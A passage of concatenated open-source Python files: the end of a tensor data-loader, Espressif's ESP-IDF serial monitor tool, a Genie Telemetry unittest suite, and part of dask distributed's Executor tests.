_pull_apart_list(column) list_tensors[column_name] = self._to_tensor(leaves, dtype) x = x, list_tensors tensors.append(x) if not offsets.empty: offsets_tensor = self._to_tensor(offsets, self._LONG_DTYPE) if len(offsets_tensor.shape) == 1: offsets_tensor = offsets_tensor[:, None] tensors.append(offsets_tensor) del gdf, offsets return tensors def _handle_tensors(self, cats, conts, labels): X = {} for tensor, names in zip([cats, conts], [self.cat_names, self.cont_names]): lists = {} if isinstance(tensor, tuple): tensor, lists = tensor names = [i for i in names if i not in lists] # now add in any scalar tensors if len(names) > 1: tensors = self._tensor_split(tensor, len(names), axis=1) lists.update(zip(names, tensors)) elif len(names) == 1: lists[names[0]] = tensor X.update(lists) for column_name in X: if column_name in self.sparse_names: if column_name not in self.sparse_max: raise ValueError( f"Did not convert {column_name} to sparse due to missing sparse_max entry" ) X[column_name] = self._to_sparse_tensor(X[column_name], column_name) # TODO: use dict for labels as well? # would require output layers to match naming if len(self.label_names) > 1: labels = self._tensor_split(labels, len(self.label_names), axis=1) return X, labels
idf_monitor.py
#!/usr/bin/env python # # esp-idf serial output monitor tool. Does some helpful things: # - Looks up hex addresses in ELF file with addr2line # - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R) # - Run "make flash" (Ctrl-T Ctrl-F) # - Run "make app-flash" (Ctrl-T Ctrl-A) # - If gdbstub output is detected, gdb is automatically loaded # # Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Contains elements taken from miniterm "Very simple serial terminal" which # is part of pySerial. https://github.com/pyserial/pyserial # (C)2002-2015 Chris Liechti <cliechti@gmx.net> # # Originally released under BSD-3-Clause license. # from __future__ import print_function, division import subprocess import argparse import codecs import re import os try: import queue except ImportError: import Queue as queue import time import sys import serial import serial.tools.miniterm as miniterm import threading import ctypes import types from distutils.version import StrictVersion key_description = miniterm.key_description # Control-key characters CTRL_A = '\x01' CTRL_B = '\x02' CTRL_F = '\x06' CTRL_H = '\x08' CTRL_R = '\x12' CTRL_T = '\x14' CTRL_Y = '\x19' CTRL_P = '\x10' CTRL_RBRACKET = '\x1d' # Ctrl+] # ANSI terminal codes ANSI_RED = '\033[1;31m' ANSI_YELLOW = '\033[0;33m' ANSI_NORMAL = '\033[0m' def color_print(message, color): """ Print a message to stderr with colored highlighting """ sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL)) def yellow_print(message): color_print(message, ANSI_YELLOW) def red_print(message): color_print(message, ANSI_RED) __version__ = "1.0" # Tags for tuples in queues TAG_KEY = 0 TAG_SERIAL = 1 # regex matches an potential PC value (0x4xxxxxxx) MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE) DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-" class StoppableThread(object): """ Provide a Thread-like class which can be 'cancelled' via a subclass-provided cancellation method. Can be started and stopped multiple times. Isn't an instance of type Thread because Python Thread objects can only be run once """ def __init__(self): self._thread = None @property def alive(self): """ Is 'alive' whenever the internal thread object exists """ return self._thread is not None def start(self): if self._thread is None: self._thread = threading.Thread(target=self._run_outer) self._thread.start() def _cancel(self): pass # override to provide cancellation functionality def run(self): pass # override for the main thread behaviour def _run_outer(self): try: self.run() finally: self._thread = None def stop(self): if self._thread is not None: old_thread = self._thread self._thread = None self._cancel() old_thread.join() class ConsoleReader(StoppableThread): """ Read input keys from the console and push them to the queue, until stopped. """ def __init__(self, console, event_queue): super(ConsoleReader, self).__init__() self.console = console self.event_queue = event_queue def run(self): self.console.setup() try: while self.alive: try: if os.name == 'nt': # Windows kludge: because the console.cancel() method doesn't # seem to work to unblock getkey() on the Windows implementation. # # So we only call getkey() if we know there's a key waiting for us. import msvcrt while not msvcrt.kbhit() and self.alive: time.sleep(0.1) if not self.alive: break c = self.console.getkey() except KeyboardInterrupt: c = '\x03' if c is not None: self.event_queue.put((TAG_KEY, c), False) finally: self.console.cleanup() def _cancel(self): if os.name == 'posix': # this is the way cancel() is implemented in pyserial 3.3 or newer, # older pyserial (3.1+) has cancellation implemented via 'select', # which does not work when console sends an escape sequence response # # even older pyserial (<3.1) does not have this method # # on Windows there is a different (also hacky) fix, applied above. # # note that TIOCSTI is not implemented in WSL / bash-on-Windows. # TODO: introduce some workaround to make it work there. import fcntl, termios fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0') class SerialReader(StoppableThread): """ Read serial data from the serial port and push to the event queue, until stopped. """ def __init__(self, serial, event_queue): super(SerialReader, self).__init__() self.baud = serial.baudrate self.serial = serial self.event_queue = event_queue if not hasattr(self.serial, 'cancel_read'): # enable timeout for checking alive flag, # if cancel_read not available self.serial.timeout = 0.25 def run(self): if not self.serial.is_open: self.serial.baudrate = self.baud self.serial.rts = True # Force an RTS reset on open self.serial.open() self.serial.rts = False try: while self.alive: data = self.serial.read(self.serial.in_waiting or 1) if len(data): self.event_queue.put((TAG_SERIAL, data), False) finally: self.serial.close() def _cancel(self): if hasattr(self.serial, 'cancel_read'): try: self.serial.cancel_read() except: pass class Monitor(object): """ Monitor application main class. This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this purpose. Main difference is that all event processing happens in the main thread, not the worker threads. """ def __init__(self, serial_instance, elf_file, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"): super(Monitor, self).__init__() self.event_queue = queue.Queue() self.console = miniterm.Console() if os.name == 'nt': sys.stderr = ANSIColorConverter(sys.stderr) self.console.output = ANSIColorConverter(self.console.output) self.console.byte_output = ANSIColorConverter(self.console.byte_output) if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'): # Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above) def getkey_patched(self): c = self.enc_stdin.read(1) if c == unichr(0x7f): c = unichr(8) # map the BS key (which yields DEL) to backspace return c self.console.getkey = types.MethodType(getkey_patched, self.console) self.serial = serial_instance self.console_reader = ConsoleReader(self.console, self.event_queue) self.serial_reader = SerialReader(self.serial, self.event_queue) self.elf_file = elf_file self.make = make self.toolchain_prefix = toolchain_prefix self.menu_key = CTRL_T self.exit_key = CTRL_RBRACKET self.translate_eol = { "CRLF": lambda c: c.replace(b"\n", b"\r\n"), "CR": lambda c: c.replace(b"\n", b"\r"), "LF": lambda c: c.replace(b"\r", b"\n"), }[eol] # internal state self._pressed_menu_key = False self._read_line = b"" self._gdb_buffer = b"" self._output_enabled = True def main_loop(self): self.console_reader.start() self.serial_reader.start() try: while self.console_reader.alive and self.serial_reader.alive: (event_tag, data) = self.event_queue.get() if event_tag == TAG_KEY: self.handle_key(data) elif event_tag == TAG_SERIAL: self.handle_serial_input(data) else: raise RuntimeError("Bad event data %r" % ((event_tag,data),)) finally: try: self.console_reader.stop() self.serial_reader.stop() except: pass sys.stderr.write(ANSI_NORMAL + "\n") def handle_key(self, key): if self._pressed_menu_key: self.handle_menu_key(key) self._pressed_menu_key = False elif key == self.menu_key: self._pressed_menu_key = True elif key == self.exit_key: self.console_reader.stop() self.serial_reader.stop() else: try: key = self.translate_eol(key) self.serial.write(codecs.encode(key)) except serial.SerialException: pass # this shouldn't happen, but sometimes port has closed in serial thread except UnicodeEncodeError: pass # this can happen if a non-ascii character was passed, ignoring def handle_serial_input(self, data): # this may need to be made more efficient, as it pushes out a byte # at a time to the console for b in data: if self._output_enabled: self.console.write_bytes(b) if b == b'\n': # end of line self.handle_serial_input_line(self._read_line.strip()) self._read_line = b"" else: self._read_line += b self.check_gdbstub_trigger(b) def handle_serial_input_line(self, line): for m in re.finditer(MATCH_PCADDR, line): self.lookup_pc_address(m.group()) def handle_menu_key(self, c): if c == self.exit_key or c == self.menu_key: # send verbatim self.serial.write(codecs.encode(c)) elif c in [ CTRL_H, 'h', 'H', '?' ]: red_print(self.get_help_text()) elif c == CTRL_R: # Reset device via RTS self.serial.setRTS(True) time.sleep(0.2) self.serial.setRTS(False) self.output_enable(True) elif c == CTRL_F: # Recompile & upload self.run_make("flash") elif c == CTRL_A: # Recompile & upload app only self.run_make("app-flash") elif c == CTRL_Y: # Toggle output display self.output_toggle() elif c == CTRL_P: yellow_print("Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart") # to fast trigger pause without press menu key self.serial.setDTR(False) # IO0=HIGH self.serial.setRTS(True) # EN=LOW, chip in reset time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1 self.serial.setDTR(True) # IO0=LOW self.serial.setRTS(False) # EN=HIGH, chip out of reset time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05 self.serial.setDTR(False) # IO0=HIGH, done else: red_print('--- unknown menu character {} --'.format(key_description(c))) def get_help_text(self): return """ --- idf_monitor ({version}) - ESP-IDF monitor tool --- based on miniterm from pySerial --- --- {exit:8} Exit program --- {menu:8} Menu escape key, followed by: --- Menu keys: --- {menu:7} Send the menu character itself to remote --- {exit:7} Send the exit character itself to remote --- {reset:7} Reset target board via RTS line --- {make:7} Run 'make flash' to build & flash --- {appmake:7} Run 'make app-flash to build & flash app --- {output:7} Toggle output display --- {pause:7} Reset target into bootloader to pause app via RTS line """.format(version=__version__, exit=key_description(self.exit_key), menu=key_description(self.menu_key), reset=key_description(CTRL_R), make=key_description(CTRL_F), appmake=key_description(CTRL_A), output=key_description(CTRL_Y), pause=key_description(CTRL_P), ) def __enter__(self): """ Use 'with self' to temporarily disable monitoring behaviour """ self.serial_reader.stop() self.console_reader.stop() def __exit__(self, *args, **kwargs): """ Use 'with self' to temporarily disable monitoring behaviour """ self.console_reader.start() self.serial_reader.start() def prompt_next_action(self, reason): self.console.setup() # set up console to trap input characters try: red_print(""" --- {} --- Press {} to exit monitor. --- Press {} to run 'make flash'. --- Press {} to run 'make app-flash'. --- Press any other key to resume monitor (resets target).""".format(reason, key_description(self.exit_key), key_description(CTRL_F), key_description(CTRL_A))) k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc. while k == CTRL_T: k = self.console.getkey() finally: self.console.cleanup() if k == self.exit_key: self.event_queue.put((TAG_KEY, k)) elif k in [ CTRL_F, CTRL_A ]: self.event_queue.put((TAG_KEY, self.menu_key)) self.event_queue.put((TAG_KEY, k)) def run_make(self, target): with self: yellow_print("Running make %s..." % target) p = subprocess.Popen([self.make, target ]) try: p.wait() except KeyboardInterrupt: p.wait() if p.returncode != 0: self.prompt_next_action("Build failed") else: self.output_enable(True) def lookup_pc_address(self, pc_addr): translation = subprocess.check_output( ["%saddr2line" % self.toolchain_prefix, "-pfiaC", "-e", self.elf_file, pc_addr], cwd=".") if not "?? ??:0" in translation: yellow_print(translation) def check_gdbstub_trigger(self, c): self._gdb_buffer = self._gdb_buffer[-6:] + c # keep the last 7 characters seen m = re.match(b"\\$(T..)#(..)", self._gdb_buffer) # look for a gdb "reason" for a break if m is not None: try: chsum = sum(ord(p) for p in m.group(1)) & 0xFF calc_chsum = int(m.group(2), 16) except ValueError: return # payload wasn't valid hex digits if chsum == calc_chsum: self.run_gdb() else: red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum)) def run_gdb(self): with self: # disable console control sys.stderr.write(ANSI_NORMAL) try: process = subprocess.Popen(["%sgdb" % self.toolchain_prefix, "-ex", "set serial baud %d" % self.serial.baudrate, "-ex", "target remote %s" % self.serial.port, "-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second self.elf_file], cwd=".") process.wait() except KeyboardInterrupt: pass # happens on Windows, maybe other OSes finally: try: # on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns... process.terminate() except: pass try: # also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode subprocess.call(["stty", "sane"]) except: pass # don't care if there's no stty, we tried... self.prompt_next_action("gdb exited") def output_enable(self, enable): self._output_enabled = enable def output_toggle(self): self._output_enabled = not self._output_enabled yellow_print("\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.".format(self._output_enabled)) def main(): parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf") parser.add_argument( '--port', '-p', help='Serial port device', default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0') ) parser.add_argument( '--baud', '-b', help='Serial port baud rate', type=int, default=os.environ.get('MONITOR_BAUD', 115200)) parser.add_argument( '--make', '-m', help='Command to run make', type=str, default='make') parser.add_argument( '--toolchain-prefix', help="Triplet prefix to add before cross-toolchain names", default=DEFAULT_TOOLCHAIN_PREFIX) parser.add_argument( "--eol", choices=['CR', 'LF', 'CRLF'], type=lambda c: c.upper(), help="End of line to use when sending to the serial port", default='CR') parser.add_argument( 'elf_file', help='ELF file of application', type=argparse.FileType('rb')) args = parser.parse_args() if args.port.startswith("/dev/tty."): args.port = args.port.replace("/dev/tty.", "/dev/cu.") yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.") yellow_print("--- Using %s instead..." % args.port) serial_instance = serial.serial_for_url(args.port, args.baud, do_not_open=True) serial_instance.dtr = False serial_instance.rts = False args.elf_file.close() # don't need this as a file # remove the parallel jobserver arguments from MAKEFLAGS, as any # parent make is only running 1 job (monitor), so we can re-spawn # all of the child makes we need (the -j argument remains part of # MAKEFLAGS) try: makeflags = os.environ["MAKEFLAGS"] makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags) os.environ["MAKEFLAGS"] = makeflags except KeyError: pass # not running a make jobserver monitor = Monitor(serial_instance, args.elf_file.name, args.make, args.toolchain_prefix, args.eol) yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format( p=serial_instance)) yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format( key_description(monitor.exit_key), key_description(monitor.menu_key), key_description(monitor.menu_key), key_description(CTRL_H))) monitor.main_loop() if os.name == 'nt': # Windows console stuff STD_OUTPUT_HANDLE = -11 STD_ERROR_HANDLE = -12 # wincon.h values FOREGROUND_INTENSITY = 8 FOREGROUND_GREY = 7 # matches the ANSI color change sequences that IDF sends RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m') # list mapping the 8 ANSI colors (the indexes) to Windows Console colors ANSI_TO_WINDOWS_COLOR = [ 0, 4, 2, 6, 1, 5, 3, 7 ] GetStdHandle = ctypes.windll.kernel32.GetStdHandle SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute class ANSIColorConverter(object): """Class to wrap a file-like output stream, intercept ANSI color codes, and convert them into calls to Windows SetConsoleTextAttribute. Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses. Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output. """ def __init__(self, output): self.output = output self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE) self.matched = b'' def _output_write(self, data): try: self.output.write(data) except IOError: # Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws # an exception (however, the character is still written to the screen) # Ref https://github.com/espressif/esp-idf/issues/1136 pass def write(self, data): for b in data: l = len(self.matched) if b == '\033': # ESC self.matched = b elif (l == 1 and b == '[') or (1 < l < 7): self.matched += b if self.matched == ANSI_NORMAL: # reset console SetConsoleTextAttribute(self.handle, FOREGROUND_GREY) self.matched = b'' elif len(self.matched) == 7: # could be an ANSI sequence m = re.match(RE_ANSI_COLOR, self.matched) if m is not None: color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))] if m.group(1) == b'1': color |= FOREGROUND_INTENSITY SetConsoleTextAttribute(self.handle, color) else: self._output_write(self.matched) # not an ANSI color code, display verbatim self.matched = b'' else: self._output_write(b) self.matched = b'' def flush(self): self.output.flush() if __name__ == "__main__": main()
test_telemetry.py
#!/usr/bin/env python # Python import os import sys import yaml import time import signal import unittest from shutil import rmtree from tempfile import mkdtemp from multiprocessing import Process from collections import OrderedDict from unittest.mock import Mock, patch, call, PropertyMock # ATS from pyats.topology import loader from pyats.aetest import CommonCleanup from pyats.datastructures import AttrDict from pyats.aetest import container from pyats.aetest.signals import AEtestPassxSignal from pyats.connections.bases import BaseConnection from pyats.results import Passed, Passx # GenieTelemetry from genie.telemetry.parser import Parser from genie.telemetry.main import GenieTelemetry from genie.telemetry import BasePlugin, Manager, TimedManager, processors class MockConnection(BaseConnection): connected = False def connect(self): self.connected = True def disconnect(self): self.connected = False def __getattr__(self, *args, **kwargs): return Mock() def parse(self, *args, **kwargs): return "MOCKED_PARSER" def learn(self, *args, **kwargs): pass def execute(self, *args, **kwargs): return 'MOCKED_EXECUTION' def __init__(self, device, alias=None, via=None, **kwargs): if alias is None: alias = device.name super().__init__(device = device, alias = alias, via = via, **kwargs) class MockTestScript(object): pass class MockSection(object): parameters = {} result = Passed message = None def passx(self, message): self.result = Passx self.message = message def __str__(self): return 'MockSection' class MockCleanup(CommonCleanup): pass class GenieTelemetryTestcase(unittest.TestCase): def setUp(self): global testbed, testbed_file, config_file, config_file2 global runinfo_dir, script, section, clean_up directory = os.path.dirname(os.path.abspath(__file__)) testbed_file = os.path.join(directory, 'scripts', 'testbed.yaml') config_file = os.path.join(directory, 'scripts', 'config.yaml') config_file2 = os.path.join(directory, 'scripts', 'config2.yaml') testbed = loader.load(testbed_file) runinfo_dir = mkdtemp(prefix='runinfo_dir') script = MockTestScript() section = MockSection() clean_up = MockCleanup() section.parent = script clean_up.parent = script def tearDown(self): rmtree(runinfo_dir) def test_base(self): with self.assertLogs('', level='INFO') as cm: processors.genie_telemetry_processor(section) output = '\n'.join(cm.output) msg = "'--genietelemetry' argument is not provided." self.assertTrue(msg in output) with self.assertLogs('', level='INFO') as cm: sys.argv = ['easypy', '--genietelemetry', config_file] processors.genie_telemetry_processor(section) output = '\n'.join(cm.output) msg = "no testbed supplied" self.assertTrue(msg in output) def test_passx_processor(self): [d.connect() for d in testbed.devices.values()] sys.argv = ['easypy', '--genietelemetry', config_file] with self.assertLogs('', level='INFO') as cm: # processors.runtime = Mock(side_effect=runtime) with patch.object(processors, 'runtime', new_callable=PropertyMock) as mock_runtime: mock_runtime.testbed = testbed mock_runtime.runinfo = AttrDict() mock_runtime.runinfo.runinfo_dir = runinfo_dir processors.genie_telemetry_processor(section) output = '\n'.join(cm.output) msg = "failed to load abstration on device P1 for plugin mockplugin" self.assertTrue(msg in output) self.assertEqual(section.result, Passx) self.assertIsNotNone(section.message) msg = ("'genie.telemetry' caught anomalies: \n" "genie.telemetry.tests.scripts.mockplugin\n\tP1\n\t\tpartial") self.assertEqual(msg, section.message) with patch.object(processors, 'runtime', new_callable=PropertyMock) as mock_runtime: mock_runtime.testbed = testbed mock_runtime.runinfo = AttrDict() mock_runtime.runinfo.runinfo_dir = runinfo_dir with self.assertRaises(AEtestPassxSignal) as cm: processors.genie_telemetry_processor(clean_up) self.assertEqual(cm.exception.reason, msg) fname = os.path.join(runinfo_dir, 'telemetry.yaml') self.assertTrue(os.path.isfile(fname)) with open(fname, 'r') as tempfile: content = yaml.safe_load(tempfile) expected = { 'common cleanup': { 'genie.telemetry.tests.scripts.mockplugin': { 'P1': {'status': 'Partial'}}, 'Crash Dumps Plugin': { 'P1': {'status': 'Ok'}}, 'Traceback Check Plugin': { 'P1': {'status': 'Ok'}}}, 'MockSection': { 'genie.telemetry.tests.scripts.mockplugin': { 'P1': {'status': 'Partial'}}, 'Crash Dumps Plugin': { 'P1': {'status': 'Ok'}}, 'Traceback Check Plugin': { 'P1': {'status': 'Ok',}}} } self.assertEqual(sorted(content.keys()), sorted(expected.keys())) for key, value in expected.items(): self.assertTrue(key in content) for plugin, devices in value.items(): content_devices = content[key].get(plugin, None) self.assertIsNotNone(content_devices) self.assertEqual(devices['P1']['status'], content_devices['P1']['status']) def test_pass_processor(self): [d.connect() for d in testbed.devices.values()] sys.argv = ['easypy', '--genietelemetry', config_file2] with self.assertLogs('', level='INFO') as cm: self.assertTrue(section.result) self.assertIsNone(section.message) # processors.runtime = Mock(side_effect=runtime) with patch.object(processors, 'runtime', new_callable=PropertyMock) as mock_runtime: mock_runtime.testbed = testbed mock_runtime.runinfo = AttrDict() mock_runtime.runinfo.runinfo_dir = runinfo_dir processors.genie_telemetry_processor(section) output = '\n'.join(cm.output) msg = "failed to load abstration on device P1 for plugin mockplugin" self.assertFalse(msg in output) self.assertTrue(section.result) self.assertIsNone(section.message) def _test_main(self): sys.argv = ['genietelemetry', testbed_file, '-configuration', config_file2, '-runinfo_dir', runinfo_dir, '-uid', 'mock', '-no_mail'] genie_telemetry = GenieTelemetry() p = Process(target=genie_telemetry.main) p.start() # wait for first interval time.sleep(15) # double ctrl+c event os.kill(p.pid, signal.SIGINT) time.sleep(1) os.kill(p.pid, signal.SIGINT) time.sleep(1) self.assertFalse(p.is_alive()) fname = os.path.join(runinfo_dir, 'telemetry.yaml') self.assertTrue(os.path.isfile(fname)) with open(fname, 'r') as tempfile: results = yaml.safe_load(tempfile) expected = {'Crash Dumps Plugin': {'P1': {'status': 'Ok'}}, 'Traceback Check Plugin': {'P1': {'status': 'Ok'}}} content = {} for r in results.values(): content.update(r) for plugin, devices in expected.items(): content_devices = content.get(plugin, None) self.assertIsNotNone(content_devices) self.assertEqual(devices['P1']['status'], content_devices['P1']['status']) fname = os.path.join(runinfo_dir, 'telemetry.log') self.assertTrue(os.path.isfile(fname)) with open(fname, 'r') as logfile: logfiles = logfile.readlines() content = [x.strip() for x in logfiles] logs = ['Loading genie.telemetry Configuration', 'Loading genie.telemetry Plugins', 'Initializing genie.telemetry Plugins for Testbed Devices', 'Initializing plugins for P1', ' - loading plugin', ' - loading plugin', 'Starting TimedManager ...', 'Setting up connection to device (P1)', None, 'Telemetry Task', None, None, 'Crash Dumps Plugin', None, '- device (P1)', 'Status : Ok', ' - Result :', 'No cores found!', None, 'Telemetry Task', None, None, 'Traceback Check Plugin', None, '- device (P1)', 'Status : Ok', ' - Result :', '***** No patterns matched *****', 'Ctrl+C keyboard interrupt detected...', 'Aborting run & cleaning up as fast as possible...', None, 'Monitoring Report'] for expected, log in zip(logs, content[:len(logs)]): if not expected: continue self.assertTrue(expected in log) def test_help(self): sys.argv = ['genietelemetry', '-h'] parser = Parser() help_output = parser.format_help() expected = ''' usage: genietelemetry [TESTBEDFILE] [-h] [-loglevel] [-configuration FILE] [-uid UID] [-runinfo_dir RUNINFO_DIR] [-callback_notify CALLBACK_NOTIFY] [-timeout TIMEOUT] [-connection_timeout CONNECTION_TIMEOUT] [-no_mail] [-no_notify] [-mailto] [-mail_subject] [-notify_subject] [-email_domain] [-smtp_host] [-smtp_port] [-smtp_username] [-smtp_password] genie telemetry command line arguments. Example ------- genietelemetry /path/to/testbed.yaml -------------------------------------------------------------------------------- Positional Arguments: TESTBEDFILE testbed file to be monitored Help: -h, -help show this help message and exit Logging: -loglevel genie telemetry logging level eg: -loglevel="INFO" Configuration: -configuration FILE configuration yaml file for plugins and settings -uid UID Specify monitoring job uid -runinfo_dir RUNINFO_DIR Specify directory to store execution logs -callback_notify CALLBACK_NOTIFY Specify Liveview callback notify URI -timeout TIMEOUT Specify plugin maximum execution length Default to 300 seconds -connection_timeout CONNECTION_TIMEOUT Specify connection timeout Mailing: -no_mail disable final email report -no_notify disable notification on device health status other than "ok" -mailto list of email recipients -mail_subject report email subject header -notify_subject notification email subject header -email_domain default email domain -smtp_host specify smtp host -smtp_port specify smtp server port -smtp_username specify smtp username -smtp_password specify smtp password ''' self.maxDiff = None self.assertEqual(help_output.strip() , expected.strip()) if __name__ == '__main__': unittest.main()
test_executor.py
from __future__ import division from operator import add, sub from collections import Iterator from concurrent.futures import CancelledError from datetime import timedelta import itertools from multiprocessing import Process import os import shutil import sys from threading import Thread from time import sleep, time import traceback import pytest from toolz import identity, isdistinct, first, concat, pluck from tornado.ioloop import IOLoop from tornado.iostream import IOStream from tornado import gen from dask.context import _globals from dask.compatibility import apply from distributed import Center, Worker, Nanny from distributed.core import rpc, dumps, loads from distributed.client import WrappedKey from distributed.executor import (Executor, Future, CompatibleExecutor, _wait, wait, _as_completed, as_completed, tokenize, _global_executor, default_executor, _first_completed, ensure_default_get, futures_of) from distributed.scheduler import Scheduler from distributed.sizeof import sizeof from distributed.utils import ignoring, sync, tmp_text from distributed.utils_test import (cluster, cluster_center, slow, _test_cluster, _test_scheduler, loop, inc, dec, div, throws, gen_cluster, gen_test, double, deep) @gen_cluster() def test_submit(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 10) assert not x.done() assert isinstance(x, Future) assert x.executor is e result = yield x._result() assert result == 11 assert x.done() y = e.submit(inc, 20) z = e.submit(add, x, y) result = yield z._result() assert result == 11 + 21 yield e._shutdown() @gen_cluster() def test_map(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() L1 = e.map(inc, range(5)) assert len(L1) == 5 assert isdistinct(x.key for x in L1) assert all(isinstance(x, Future) for x in L1) result = yield L1[0]._result() assert result == inc(0) assert len(s.tasks) == 5 L2 = e.map(inc, L1) result = yield L2[1]._result() assert result == inc(inc(1)) assert len(s.tasks) == 10 # assert L1[0].key in s.tasks[L2[0].key] total = e.submit(sum, L2) result = yield total._result() assert result == sum(map(inc, map(inc, range(5)))) L3 = e.map(add, L1, L2) result = yield L3[1]._result() assert result == inc(1) + inc(inc(1)) L4 = e.map(add, range(3), range(4)) results = yield e._gather(L4) if sys.version_info[0] >= 3: assert results == list(map(add, range(3), range(4))) def f(x, y=10): return x + y L5 = e.map(f, range(5), y=5) results = yield e._gather(L5) assert results == list(range(5, 10)) y = e.submit(f, 10) L6 = e.map(f, range(5), y=y) results = yield e._gather(L6) assert results == list(range(20, 25)) yield e._shutdown() @gen_cluster() def test_compatible_map(s, a, b): e = CompatibleExecutor((s.ip, s.port), start=False) yield e._start() results = e.map(inc, range(5)) assert not isinstance(results, list) # Since this map blocks as it waits for results, # waiting here will block the current IOLoop, # which happens to also be running the test Workers. # So wait on the results in a background thread to avoid blocking. f = gen.Future() def wait_on_results(): f.set_result(list(results)) t = Thread(target=wait_on_results) t.daemon = True t.start() result_list = yield f # getting map results blocks assert result_list == list(map(inc, range(5))) yield e._shutdown() @gen_cluster() def test_future(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 10) assert str(x.key) in repr(x) assert str(x.status) in repr(x) yield e._shutdown() @gen_cluster() def test_Future_exception(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(div, 1, 0) result = yield x._exception() assert isinstance(result, ZeroDivisionError) x = e.submit(div, 1, 1) result = yield x._exception() assert result is None yield e._shutdown() def test_Future_exception_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(div, 1, 0) assert isinstance(x.exception(), ZeroDivisionError) x = e.submit(div, 1, 1) assert x.exception() is None @gen_cluster() def test_map_naming(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() L1 = e.map(inc, range(5)) L2 = e.map(inc, range(5)) assert [x.key for x in L1] == [x.key for x in L2] L3 = e.map(inc, [1, 1, 1, 1]) assert len({x.event for x in L3}) == 1 L4 = e.map(inc, [1, 1, 1, 1], pure=False) assert len({x.event for x in L4}) == 4 yield e._shutdown() @gen_cluster() def test_submit_naming(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() a = e.submit(inc, 1) b = e.submit(inc, 1) assert a.event is b.event c = e.submit(inc, 1, pure=False) assert c.key != a.key yield e._shutdown() @gen_cluster() def test_exceptions(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(div, 1, 2) result = yield x._result() assert result == 1 / 2 x = e.submit(div, 1, 0) with pytest.raises(ZeroDivisionError): result = yield x._result() x = e.submit(div, 10, 2) # continues to operate result = yield x._result() assert result == 10 / 2 yield e._shutdown() @gen_cluster() def test_gc(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 10) result = yield x._result() assert s.who_has[x.key] x.__del__() yield e._shutdown() assert not s.who_has[x.key] def test_thread(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(inc, 1) assert x.result() == 2 def test_sync_exceptions(loop): with cluster() as (s, [a, b]): e = Executor(('127.0.0.1', s['port']), loop=loop) x = e.submit(div, 10, 2) assert x.result() == 5 y = e.submit(div, 10, 0) try: y.result() assert False except ZeroDivisionError: pass z = e.submit(div, 10, 5) assert z.result() == 2 e.shutdown() @gen_cluster() def test_stress_1(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() n = 2**6 seq = e.map(inc, range(n)) while len(seq) > 1: yield gen.sleep(0.1) seq = [e.submit(add, seq[i], seq[i + 1]) for i in range(0, len(seq), 2)] result = yield seq[0]._result() assert result == sum(map(inc, range(n))) yield e._shutdown() @gen_cluster() def test_gather(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 10) y = e.submit(inc, x) result = yield e._gather(x) assert result == 11 result = yield e._gather([x]) assert result == [11] result = yield e._gather({'x': x, 'y': [y]}) assert result == {'x': 11, 'y': [12]} yield e._shutdown() def test_gather_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(inc, 1) assert e.gather(x) == 2 y = e.submit(div, 1, 0) with pytest.raises(ZeroDivisionError): e.gather([x, y]) [xx] 